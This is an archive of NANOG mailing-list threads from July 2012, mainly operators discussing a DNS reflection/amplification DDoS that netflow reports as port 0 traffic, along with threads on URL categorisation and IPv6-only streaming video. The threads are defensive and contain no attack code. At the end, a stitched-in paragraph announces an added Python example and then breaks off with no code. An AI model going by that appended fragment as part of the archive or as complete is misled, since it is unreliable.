-- Thanks, Joe On Tue, Jul 24, 2012 at 6:32 PM, Christopher Morrow wrote: > from this search, fyi: > > https://www.google.com/search?q=squid+url+filtering+classification > > On Tue, Jul 24, 2012 at 9:32 PM, Christopher Morrow > wrote: >> http://www.urlfilterdb.com/en/support/faq.html >> >> On Tue, Jul 24, 2012 at 9:30 PM, JoeSox wrote: >>> Does anyone know of an open source database, flat file lists, or API >>> that allows me to feed a url and have it return a category >>> classification >>> For example, something like this >>> http://www1.k9webprotection.com/support/check-site-rating >>> >>> I know of dansguardian but it doesn't have battlefield.com as a game >>> site and is more of a blacklist. >>> I thought I saw one a few years back but it was only for linux but >>> still had categories. >>> -- >>> Thanks, Joe >>> From frnkblk at iname.com Tue Jul 24 22:40:34 2012 From: frnkblk at iname.com (Frank Bulk) Date: Tue, 24 Jul 2012 22:40:34 -0500 Subject: DDoS using port 0 and 53 (DNS) Message-ID: <003101cd6a17$3f81ddc0$be859940$@iname.com> Several times this year our customers have suffered DDoS' ranging from 30 Mbps to over 1 Gbps, sometimes sustained, sometimes in several-minute spurts. They are targeted at one IP address, and most times our netflow tool identifies that a large percentage of the traffic is "port 0". The one from today had about 89% port 0 and 11% port 53 (DNS). If it happens repeatedly or continuously we just have our upstream provider blackhole the target (victim) IP address. I've been tempted to ask our upstream provider to block all traffic to us that's targeted to tcp or udp port 0 -- is that safe to do? I found two NANOG archives that talk about this http://www.nanog.org/mailinglist/mailarchives/old_archive/2005-04/msg00091.html http://www.gossamer-threads.com/lists/nanog/users/18990 and the first suggests that port zero could really be fragmented packets.
Unfortunately I don't have packet captures of any of the attacks, so I can't examine them for more detail, but wondering if there was some collective wisdom about blocking port 0. Regards, Frank From rdobbins at arbor.net Tue Jul 24 23:05:48 2012 From: rdobbins at arbor.net (Roland Dobbins) Date: Wed, 25 Jul 2012 11:05:48 +0700 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: <003101cd6a17$3f81ddc0$be859940$@iname.com> References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: Frank Bulk wrote: >Unfortunately I don't have packet captures of any of the attacks, so I >can't examine them for more detail, but wondering if there was some >collective wisdom about blocking port 0. Yes - don't do it, or you will break the Internet. These are non-initial fragments. You or your customers are on the receiving end of DNS reflection/amplification attacks, and the large unsolicited DNS responses being used to packet you/them are fragmented. Use S/RTBH, flowspec, IDMS, and/or coordination with your peers/upstreams to block these attacks when they occur. Do *not* perform wholesale blocking of non-initial fragments (i.e., src/dst port 0), or you will have many unhappy customers and soon-to-be former customers. ;> ----------------------------------- Roland Dobbins From mysidia at gmail.com Tue Jul 24 23:10:52 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Tue, 24 Jul 2012 23:10:52 -0500 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: <003101cd6a17$3f81ddc0$be859940$@iname.com> References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: On 7/24/12, Frank Bulk wrote: > Unfortunately I don't have packet captures of any of the attacks, so I > can't examine them for more detail, but wondering if there was some collective > wisdom about blocking port 0. It should be relatively safe to drop (non-fragment) packets to/from port 0.
If I recall correctly, there are some routers that perform a "helpful" numeric value validation when the human is entering port numbers for access list rules, that _do_ forward port 0 traffic, and through some sort of oversight by the router/firewall vendor actually _prevent_ the administrator from selecting port 0 in a deny rule, eg. "Port to deny must be a number from 1 to 65535". TCP/UDP port 0 is technically a legal port, but it's also a reserved port, and very unusual for it to be used on the network for any legitimate purpose. Various firewalls will discard anything TCP/UDP sent to/from port 0. Many TCP/UDP sockets implementations won't even let an application select port 0. bind() to port 0 is treated as a signal that the application wants the sockets API to pick a high-numbered ephemeral port. > Regards, > Frank -- -JH From frnkblk at iname.com Tue Jul 24 23:50:06 2012 From: frnkblk at iname.com (Frank Bulk) Date: Tue, 24 Jul 2012 23:50:06 -0500 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: <003f01cd6a20$f66cb6f0$e34624d0$@iname.com> Thanks for confirming what was discussed in the NANOG archive. I now have warm fuzzies knowing that all my protections are reactive. =) I will be talking with our upstream provider to see if they can enable some better automation (because they run a larger shop). I know they were able to null route in seconds, we just need a faster way to identify targets. Frank -----Original Message----- From: Roland Dobbins [mailto:rdobbins at arbor.net] Sent: Tuesday, July 24, 2012 11:06 PM To: Frank Bulk; nanog at nanog.org Subject: Re: DDoS using port 0 and 53 (DNS) Frank Bulk wrote: >Unfortunately I don't have packet captures of any of the attacks, so I >can't exam them for more detail, but wondering if there was some >collective wisdom about blocking port 0. Yes - don't do it, or you will break the Internet. These are non-initial fragments. 
You or your customers are on the receiving end of DNS reflection/amplification attacks, and the large unsolicited DNS responses being used to packet you/them are fragmented. Use S/RTBH, flowspec, IDMS, and/or coordination with your peers/upstreams to block these attacks when they occur. Do *not* perform wholesale blocking of non-initial fragments (i.e., src/dst port 0), or you will have many unhappy customers and soon-to-be former customers. ;> ----------------------------------- Roland Dobbins From mysidia at gmail.com Wed Jul 25 00:08:19 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Wed, 25 Jul 2012 00:08:19 -0500 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: On 7/24/12, Roland Dobbins wrote: > Frank Bulk wrote: >>can't exam them for more detail, but wondering if there was some >>collective wisdom about blocking port 0. > Yes - don't do it, or you will break the Internet. These are non-initial Without a packet capture to look at, that's really just a blind assumption. A port number of a non-initial fragment does not exist at all, because the Layer 4 info is unavailable in that case, something _might_ lie and say the port number is 0, but it should not -- there is no TCP header with any port numbers, the only fields available to check against on such packets are Layer 3 fields such as protocol, source, destination address. The port number of the Layer 4 connection cannot be determined without executing IP fragment reassembly in that case. Routers normally reassemble fragments they receive, if possible. An access list statement attempting to match against non-present Layer 4 information, should not work; on a stateful firewall, the presence of the rule might trigger a fragment reassembly, on a router, the non-applicable ACL entry referring to a non-existent port number will generally be ignored. A full capture should not be necessary. 
You determine if a packet is a fragment by examining the MF flag, bit 50, and fragmentation offset of the IPv4 header; bits 51 through 63. You only need to look at the first 8 bytes of the IP header. If the MF bit is set to 0, and the fragmentation offset is also all bits 0, then the packet is not part of a fragment. The packet is a non-initial fragment if and only if, the fragmentation offset is not set to zero. Port number's not a field you look at for that. -- -JH From sthaug at nethelp.no Wed Jul 25 01:13:20 2012 From: sthaug at nethelp.no (sthaug at nethelp.no) Date: Wed, 25 Jul 2012 08:13:20 +0200 (CEST) Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: <20120725.081320.74666464.sthaug@nethelp.no> > The port number of the Layer 4 connection cannot be determined without > executing IP fragment reassembly in that case. Routers normally > reassemble fragments they receive, if possible. No, routers normally do *not* reassemble fragments. This is typically done by hosts and firewalls. Steinar Haug, Nethelp consulting, sthaug at nethelp.no From rdobbins at arbor.net Wed Jul 25 01:49:40 2012 From: rdobbins at arbor.net (Dobbins, Roland) Date: Wed, 25 Jul 2012 06:49:40 +0000 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: <2EFB4567-C72E-4B4F-96D8-F0EC4C0276E4@arbor.net> On Jul 25, 2012, at 12:08 PM, Jimmy Hess wrote: > The packet is a non-initial fragment if and only if, the fragmentation offset is not set to zero. Port number's not a field you look at for that. I understand all that, thanks. NetFlow reports source/dest port 0 for non-initial fragments. That, coupled with the description of the attack, makes it a near-certainty that the observed attack was a DNS reflection/amplification attack. 
Furthermore, most routers can't perform the type of filtering necessary to check deeply into the packet header in order to determine if a given packet is a well-formed non-initial fragment or not. And finally, many router implementations interpret source/dest port 0 as - yes, you guessed it - non-initial fragments. Hence, it's not a good idea to filter on source/dest port 0. ----------------------------------------------------------------------- Roland Dobbins // Luck is the residue of opportunity and design. -- John Milton From rdobbins at arbor.net Wed Jul 25 01:50:38 2012 From: rdobbins at arbor.net (Dobbins, Roland) Date: Wed, 25 Jul 2012 06:50:38 +0000 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: <20120725.081320.74666464.sthaug@nethelp.no> References: <003101cd6a17$3f81ddc0$be859940$@iname.com> <20120725.081320.74666464.sthaug@nethelp.no> Message-ID: <319BE87A-9E33-4B21-8F3A-6E17A1E3B126@arbor.net> On Jul 25, 2012, at 1:13 PM, wrote: > No, routers normally do *not* reassemble fragments. Absolutely correct. I missed this in the rest of the reply, good catch! ----------------------------------------------------------------------- Roland Dobbins // Luck is the residue of opportunity and design. -- John Milton From jtk at cymru.com Wed Jul 25 09:43:43 2012 From: jtk at cymru.com (John Kristoff) Date: Wed, 25 Jul 2012 09:43:43 -0500 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: <20120725094343.16f4a397@localhost> On Tue, 24 Jul 2012 23:10:52 -0500 Jimmy Hess wrote: > It should be relatively safe to drop (non-fragment) packets to/from > port 0. [...] Some UDP applications will use zero as a source port when they do not expect a response, which is how many one-way UDP-based apps operate, though not all. 
This behavior is spelled out in the IETF RFC 768: "Source Port is an optional field, when meaningful, it indicates the port of the sending process, and may be assumed to be the port to which a reply should be addressed in the absence of any other information. If not used, a value of zero is inserted." John From joelja at bogus.com Wed Jul 25 09:51:09 2012 From: joelja at bogus.com (joel jaeggli) Date: Wed, 25 Jul 2012 07:51:09 -0700 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: References: Message-ID: <501007DD.9070702@bogus.com> On 7/18/12 6:24 PM, Andrey Khomyakov wrote: > So some "comments" on the intertubes claim that DoD ok'd use of its > unadvertised space on private networks. Is there any official reference > that may support this statement that anyone of you have seen out there? The ARPANET prefix (10/8) was returned to IANA circa 1990; it's now RFC 1918. Everything else is urban myth. > --Andrey > From jmaslak at antelope.net Wed Jul 25 09:52:42 2012 From: jmaslak at antelope.net (Joel Maslak) Date: Wed, 25 Jul 2012 08:52:42 -0600 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: <20120725094343.16f4a397@localhost> References: <003101cd6a17$3f81ddc0$be859940$@iname.com> <20120725094343.16f4a397@localhost> Message-ID: On Wed, Jul 25, 2012 at 8:43 AM, John Kristoff wrote: > Some UDP applications will use zero as a source port when they do not > expect a response, which is how many one-way UDP-based apps operate, > though not all. This behavior is spelled out in the IETF RFC 768: That would only be applicable if the box was expecting to receive UDP and not send a response. I'm not sure I can think of anything but specialized, vertical applications that would have that behavior with port zero (syslog and SNMP traps send without expecting a response, but they don't use port zero in any implementation I've seen, and neither is generally allowed to be received from the internet at large).
In addition to the fragments, these packets might also be non-TCP/UDP (ICMP, GRE, 6to4 and other IP-IP, etc). If the host doesn't expect to receive large UDP packets, you can block UDP fragments. Note that recursive DNS servers would need UDP fragments (well, if you want to do large DNS packets - if you set the right options, you can turn that off). But if you aren't generally providing UDP services, blocking UDP packets, especially to stop an attack, wouldn't hurt (you can also block anything with the MF bit set). If you block these fragments at your provider's router, and it is a DNS amplification attack, your problems are probably solved until the hacker figures it out. Just make sure you think of things like recursive DNS and other applications that may be using UDP fragments. From frnkblk at iname.com Wed Jul 25 10:27:55 2012 From: frnkblk at iname.com (Frank Bulk) Date: Wed, 25 Jul 2012 10:27:55 -0500 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: <000001cd6a7a$1096b900$31c42b00$@iname.com> Can netflow _properly_ "capture" whether a packet is a fragment or not? If not, does IPFIX address this? Frank -----Original Message----- From: Jimmy Hess [mailto:mysidia at gmail.com] Sent: Wednesday, July 25, 2012 12:08 AM To: Roland Dobbins Cc: Frank Bulk; nanog at nanog.org Subject: Re: DDoS using port 0 and 53 (DNS) On 7/24/12, Roland Dobbins wrote: > Frank Bulk wrote: >>can't examine them for more detail, but wondering if there was some >>collective wisdom about blocking port 0. > Yes - don't do it, or you will break the Internet. These are non-initial Without a packet capture to look at, that's really just a blind assumption.
A port number of a non-initial fragment does not exist at all, because the Layer 4 info is unavailable in that case, something _might_ lie and say the port number is 0, but it should not -- there is no TCP header with any port numbers, the only fields available to check against on such packets are Layer 3 fields such as protocol, source, destination address. The port number of the Layer 4 connection cannot be determined without executing IP fragment reassembly in that case. Routers normally reassemble fragments they receive, if possible. An access list statement attempting to match against non-present Layer 4 information, should not work; on a stateful firewall, the presence of the rule might trigger a fragment reassembly, on a router, the non-applicable ACL entry referring to a non-existent port number will generally be ignored. A full capture should not be necessary. You determine if a packet is a fragment by examining the MF flag, bit 50, and fragmentation offset of the IPv4 header; bits 51 through 63. You only need to look at the first 8 bytes of the IP header. If the MF bit is set to 0, and the fragmentation offset is also all bits 0, then the packet is not part of a fragment. The packet is a non-initial fragment if and only if, the fragmentation offset is not set to zero. Port number's not a field you look at for that. -- -JH From rdobbins at arbor.net Wed Jul 25 11:39:13 2012 From: rdobbins at arbor.net (Dobbins, Roland) Date: Wed, 25 Jul 2012 16:39:13 +0000 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> <20120725094343.16f4a397@localhost> Message-ID: On Jul 25, 2012, at 9:52 PM, Joel Maslak wrote: > In addition to the fragments, these packets might also be non-TCP/UDP (ICMP, GRE, 6to4 and other IP-IP, etc). NetFlow will report the correct protocol number. ----------------------------------------------------------------------- Roland Dobbins // Luck is the residue of opportunity and design. 
-- John Milton From rdobbins at arbor.net Wed Jul 25 11:41:27 2012 From: rdobbins at arbor.net (Dobbins, Roland) Date: Wed, 25 Jul 2012 16:41:27 +0000 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: <000001cd6a7a$1096b900$31c42b00$@iname.com> References: <003101cd6a17$3f81ddc0$be859940$@iname.com> <000001cd6a7a$1096b900$31c42b00$@iname.com> Message-ID: <06DDAEA5-41C4-431A-811E-B1F391ACF201@arbor.net> On Jul 25, 2012, at 10:27 PM, Frank Bulk wrote: > Can netflow _properly_ "capture" whether a packet is a fragment or not? No. > If not, does IPFIX address this? Yes. But this is all a distraction. We are now down in the weeds. Your customers were victims of a DNS reflection/amplification attack. The issue of fragmentation is moot. The defense methodologies already discussed are how folks typically deal with these attacks. There isn't an overarching network access policy list you can apply at your edges or ask your peers/upstreams to apply which will mask them - the optimal approach is to deal with them on a case-by-case basis. ----------------------------------------------------------------------- Roland Dobbins // Luck is the residue of opportunity and design. -- John Milton From jwbensley at gmail.com Wed Jul 25 11:58:59 2012 From: jwbensley at gmail.com (James Bensley) Date: Wed, 25 Jul 2012 17:58:59 +0100 Subject: Paging Deutsche Telekom Message-ID: Any DTAG engineers on list? We are having a serious problem with them at present. Cheers, James. From da.shi at 3z.ca Wed Jul 25 12:05:44 2012 From: da.shi at 3z.ca (Da Shi) Date: Wed, 25 Jul 2012 13:05:44 -0400 Subject: Paging Deutsche Telekom In-Reply-To: References: Message-ID: <-4605891815588390432@unknownmsgid> noc at telekom.de cip-peer at nmc-m.dtag.de for bgp related On 2012-07-25, at 12:59 PM, James Bensley wrote: > Any DTAG engineers on list? We are having a serious problem with them at > present. > > Cheers, > James.
From Tina.Tsou.Zouting at huawei.com Wed Jul 25 12:11:43 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Wed, 25 Jul 2012 17:11:43 +0000 Subject: IPv6 only streaming video Message-ID: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> http://video.v6.labs.lacnic.net/jw/ Server cannot be found since yesterday. Has the URL been changed? Tina 408-859-4996 From morrowc.lists at gmail.com Wed Jul 25 13:27:03 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Wed, 25 Jul 2012 14:27:03 -0400 Subject: IPv6 only streaming video In-Reply-To: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> Message-ID: On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU wrote: > http://video.v6.labs.lacnic.net/jw/ > Server cannot be found since yesterday. Has the URL been changed? > > did you mean to email the lacnic folks? From Tina.Tsou.Zouting at huawei.com Wed Jul 25 13:37:42 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Wed, 25 Jul 2012 18:37:42 +0000 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> Message-ID: We got offline after discussion in NANOG in May. This IPv6 only streaming video worked well until recently. We use it in my enterprise network. I just could not find his contact in my mailbox. So I hope he can find me again. Is the link accessible from your IPv6 host? Tina @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e > -----Original Message----- > From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com] > On Behalf Of Christopher Morrow > Sent: Wednesday, July 25, 2012 11:27 AM > To: Tina TSOU > Cc: nanog at nanog.org > Subject: Re: IPv6 only streaming video > > On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU > wrote: > > http://video.v6.labs.lacnic.net/jw/ > > Server cannot be found since yesterday. Has the URL been changed? > > > > > > did you mean to email the lacnic folks?
From aservin at lacnic.net Wed Jul 25 13:58:12 2012 From: aservin at lacnic.net (Arturo Servin) Date: Wed, 25 Jul 2012 15:58:12 -0300 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> Message-ID: Oh! We had it as a test service. We didn't know that it was being used by more people, so probably somebody turned it off. I will look around to restart it. Thanks! as On 25 Jul 2012, at 15:37, Tina TSOU wrote: > We got offline after discussion in NANOG in May. This IPv6 only streaming video worked well until recently. We use it in my enterprise network. > I just could not find his contact in my mailbox. So I hope he can find me again. > Is the link accessible from your IPv6 host? > > Tina > @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e > >> -----Original Message----- >> From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com] >> On Behalf Of Christopher Morrow >> Sent: Wednesday, July 25, 2012 11:27 AM >> To: Tina TSOU >> Cc: nanog at nanog.org >> Subject: Re: IPv6 only streaming video >> >> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU >> wrote: >>> http://video.v6.labs.lacnic.net/jw/ >>> Server cannot be found since yesterday. Has the URL been changed? >>> >>> >> >> did you mean to email the lacnic folks? From aservin at lacnic.net Wed Jul 25 14:14:05 2012 From: aservin at lacnic.net (Arturo Servin) Date: Wed, 25 Jul 2012 16:14:05 -0300 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> Message-ID: <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> The licence expired. We will see if we can get another one. Cheers, as On 25 Jul 2012, at 15:58, Arturo Servin wrote: > > Oh! > > We had it as a test service.
We didn't know that it was been used by more people, so probably somebody turn it off. > > I will look around to restart it. > > Thanks! > as > > On 25 Jul 2012, at 15:37, Tina TSOU wrote: > >> We got offline after discussion in NANOG in May. This IPv6 only streaming video worked well until recently. We use it in my enterprise network. >> I just could not find his contact in my mailbox. So I hope he can find me again. >> Does the link accessible from your IPv6 host? >> >> Tina >> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e >> >>> -----Original Message----- >>> From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com] >>> On Behalf Of Christopher Morrow >>> Sent: Wednesday, July 25, 2012 11:27 AM >>> To: Tina TSOU >>> Cc: nanog at nanog.org >>> Subject: Re: IPv6 only streaming video >>> >>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU >>> wrote: >>>> http://video.v6.labs.lacnic.net/jw/ >>>> Server can not be found since yesterday. Has the URL been changed? >>>> >>>> >>> >>> did you mean to email the lacnic folks? > From Tina.Tsou.Zouting at huawei.com Wed Jul 25 15:15:35 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Wed, 25 Jul 2012 20:15:35 +0000 Subject: IPv6 only streaming video In-Reply-To: <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> Message-ID: Dear all, If you know there is any testing or commercial IPv6 only streaming video we can access, let me know. Thank you. Tina > -----Original Message----- > From: Arturo Servin [mailto:aservin at lacnic.net] > Sent: Wednesday, July 25, 2012 12:14 PM > To: Tina TSOU > Cc: nanog at nanog.org > Subject: Re: IPv6 only streaming video > > > The licence expired. > > We will see if we can get another one. > > Cheers, > as > > On 25 Jul 2012, at 15:58, Arturo Servin wrote: > > > > > Oh! > > > > We had it as a test service. 
We didn't know that it was been used > by more people, so probably somebody turn it off. > > > > I will look around to restart it. > > > > Thanks! > > as > > > > On 25 Jul 2012, at 15:37, Tina TSOU wrote: > > > >> We got offline after discussion in NANOG in May. This IPv6 only > streaming video worked well until recently. We use it in my enterprise > network. > >> I just could not find his contact in my mailbox. So I hope he can > find me again. > >> Does the link accessible from your IPv6 host? > >> > >> Tina > >> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e > >> > >>> -----Original Message----- > >>> From: christopher.morrow at gmail.com > [mailto:christopher.morrow at gmail.com] > >>> On Behalf Of Christopher Morrow > >>> Sent: Wednesday, July 25, 2012 11:27 AM > >>> To: Tina TSOU > >>> Cc: nanog at nanog.org > >>> Subject: Re: IPv6 only streaming video > >>> > >>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU > >>> wrote: > >>>> http://video.v6.labs.lacnic.net/jw/ > >>>> Server can not be found since yesterday. Has the URL been changed? > >>>> > >>>> > >>> > >>> did you mean to email the lacnic folks? > > From morrowc.lists at gmail.com Wed Jul 25 15:48:57 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Wed, 25 Jul 2012 16:48:57 -0400 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> Message-ID: On Wed, Jul 25, 2012 at 4:15 PM, Tina TSOU wrote: > Dear all, > If you know there is any testing or commercial IPv6 only streaming video we can access, let me know. > Thank you. youtube will stream at you over ipv6 ... did you just need some thing to stream at you over ipv6? I think you can even (if you do the 'i have cable/etc' dance) stream the olympics from nbc over v6 these days. 
From Tina.Tsou.Zouting at huawei.com Wed Jul 25 16:09:43 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Wed, 25 Jul 2012 21:09:43 +0000 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> Message-ID: My enterprise users need to turn off IPv4 on their hosts to experience YouTube IPv6 only streaming video. Courtesy to Owen. It is an enterprise network here, I can't dictate for everyone. Some people prefer dual stack host, some people prefer IPv6 only host. Youtube works in our IPv6 only host and dual stack host. Ipv6.netflix.com doesn't seem to work in our dual stack host and IPv6 only host. Do you have the URL of IPv6 only stream video about the Olympics from nbc? Tina > -----Original Message----- > From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com] > On Behalf Of Christopher Morrow > Sent: Wednesday, July 25, 2012 1:49 PM > To: Tina TSOU > Cc: Arturo Servin; nanog at nanog.org > Subject: Re: IPv6 only streaming video > > On Wed, Jul 25, 2012 at 4:15 PM, Tina TSOU > wrote: > > Dear all, > > If you know there is any testing or commercial IPv6 only streaming > video we can access, let me know. > > Thank you. > > youtube will stream at you over ipv6 ... did you just need some thing > to stream at you over ipv6? > I think you can even (if you do the 'i have cable/etc' dance) stream > the olympics from nbc over v6 these days. 
From drew.weaver at thenap.com Wed Jul 25 17:13:52 2012
From: drew.weaver at thenap.com (Drew Weaver)
Date: Wed, 25 Jul 2012 18:13:52 -0400
Subject: DDoS using port 0 and 53 (DNS)
In-Reply-To: <003101cd6a17$3f81ddc0$be859940$@iname.com>
References: <003101cd6a17$3f81ddc0$be859940$@iname.com>
Message-ID:

Another nice "emerging" tool [I say emerging because it's been around forever but nobody implements it] to deal with this is Flowspec. Using flowspec you can instruct your upstream to block traffic with much more granular characteristics.

Instead of dropping all traffic to the IP address, you can drop (for example) udp dst 80 traffic to the IP address, or traffic from a particular source to a particular DST.

It can also be initiated by your side without interaction from the upstream ISP.

Just saying =)

-Drew

-----Original Message-----
From: Frank Bulk [mailto:frnkblk at iname.com]
Sent: Tuesday, July 24, 2012 11:41 PM
To: nanog at nanog.org
Subject: DDoS using port 0 and 53 (DNS)

Several times this year our customers have suffered DDoSes ranging from 30 Mbps to over 1 Gbps, sometimes sustained, sometimes in several-minute spurts. They are targeted at one IP address, and most times our netflow tool identifies that a large percentage of the traffic is "port 0". The one from today had about 89% port 0 and 11% port 53 (DNS).

If it happens repeatedly or continuously we just have our upstream provider blackhole the target (victim) IP address.

I've been tempted to ask our upstream provider to block all traffic to us that's targeted to tcp or udp port 0 -- is that safe to do? I found two NANOG archives that talk about this
http://www.nanog.org/mailinglist/mailarchives/old_archive/2005-04/msg00091.html
http://www.gossamer-threads.com/lists/nanog/users/18990
and the first suggests that port zero could really be fragmented packets.

Unfortunately I don't have packet captures of any of the attacks, so I can't examine them for more detail, but I am wondering if there is some collective wisdom about blocking port 0.

Regards,

Frank

From marka at isc.org Wed Jul 25 18:19:41 2012
From: marka at isc.org (Mark Andrews)
Date: Thu, 26 Jul 2012 09:19:41 +1000
Subject: DDoS using port 0 and 53 (DNS)
In-Reply-To: Your message of "Wed, 25 Jul 2012 08:52:42 CST."
References: <003101cd6a17$3f81ddc0$be859940$@iname.com> <20120725094343.16f4a397@localhost>
Message-ID: <20120725231941.4AF2122FFE41@drugs.dv.isc.org>

In message , Joel Maslak writes:
> On Wed, Jul 25, 2012 at 8:43 AM, John Kristoff wrote:
>
>> Some UDP applications will use zero as a source port when they do not
>> expect a response, which is how many one-way UDP-based apps operate,
>> though not all. This behavior is spelled out in the IETF RFC 768:
>
> That would only be applicable if the box was expecting to receive UDP and not send a response. I'm not sure I can think of anything but specialized, vertical applications that would have that behavior with port zero (syslog and SNMP traps send without expecting a response, but they don't use port zero in any implementation I've seen, and neither is generally allowed to be received from the internet at large).
>
> In addition to the fragments, these packets might also be non-TCP/UDP (ICMP, GRE, 6to4 and other IP-IP, etc). If the host doesn't expect to receive large UDP packets, you can block UDP fragments. Note that recursive DNS servers would need UDP fragments (well, if you want to do large DNS packets - if you set the right options, you can turn that off). But if you aren't generally providing UDP services, blocking UDP packets, especially to stop an attack, wouldn't hurt (you can also block anything with the MF bit set). If you block these fragments at your provider's router, and it is a DNS amplification attack, your problems are probably solved until the hacker figures it out. Just make sure you think of things like recursive DNS and other applications that may be using UDP fragments.

Actually *all* IPv6 nodes are supposed to support EDNS so *all* IPv6 hosts should be expecting to receive fragmented UDP for DNS. Add to that all hosts that do DNSSEC validation in the stub resolver / application. With DANE this will be any host with a web browser.

Mark
--
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742                 INTERNET: marka at isc.org

From randy at psg.com Wed Jul 25 19:20:08 2012
From: randy at psg.com (Randy Bush)
Date: Wed, 25 Jul 2012 17:20:08 -0700
Subject: IPv6 only streaming video
In-Reply-To:
References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net>
Message-ID:

> My enterprise users

it is generally best if vendors do not speak for users and vice versa

randy

From morrowc.lists at gmail.com Wed Jul 25 20:34:02 2012
From: morrowc.lists at gmail.com (Christopher Morrow)
Date: Wed, 25 Jul 2012 21:34:02 -0400
Subject: IPv6 only streaming video
In-Reply-To:
References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net>
Message-ID:

On Wed, Jul 25, 2012 at 5:09 PM, Tina TSOU wrote:
> My enterprise users need to turn off IPv4 on their hosts to experience YouTube IPv6 only streaming video. Courtesy to Owen.

I think if you have a dual-stack host you'll just get the v6 version of stream... I suppose there are happy-eyeball cases where v4 may win the race though? Is that what you're seeing in this case? (do the hosts even attempt a AAAA lookup, and a subsequent connect to the v6 address, presuming a AAAA was returned to them)

> It is an enterprise network here, I can't dictate for everyone. Some people prefer dual stack host, some people prefer IPv6 only host.
> Youtube works in our IPv6 only host and dual stack host.

ok, so... win?

> Ipv6.netflix.com doesn't seem to work in our dual stack host and IPv6 only host.
> Do you have the URL of IPv6 only stream video about the Olympics from nbc?
>

nbc looks to be using youtube for the streams, so ... any one of their streams should go over v6 (or v4). This one isn't olympics related, but streamed over v6 to me...

> Tina
>
>
>> -----Original Message-----
>> From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com]
>> On Behalf Of Christopher Morrow
>> Sent: Wednesday, July 25, 2012 1:49 PM
>> To: Tina TSOU
>> Cc: Arturo Servin; nanog at nanog.org
>> Subject: Re: IPv6 only streaming video
>>
>> On Wed, Jul 25, 2012 at 4:15 PM, Tina TSOU wrote:
>>> Dear all,
>>> If you know there is any testing or commercial IPv6 only streaming video we can access, let me know.
>>> Thank you.
>>
>> youtube will stream at you over ipv6 ... did you just need something to stream at you over ipv6?
>> I think you can even (if you do the 'i have cable/etc' dance) stream the olympics from nbc over v6 these days.
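For the port 0 / port 53 thread above (Frank Bulk's question and the fragment explanation from Joel Maslak and Mark Andrews), the following is an added Python example, not code from any of the posters. It shows why a port-oriented flow tool reports non-initial fragments and port-less protocols as "port 0", and what a provider-side "drop tcp/udp to us with port 0" rule would also catch; every packet record and address below is constructed (RFC 5737 documentation ranges).

```python
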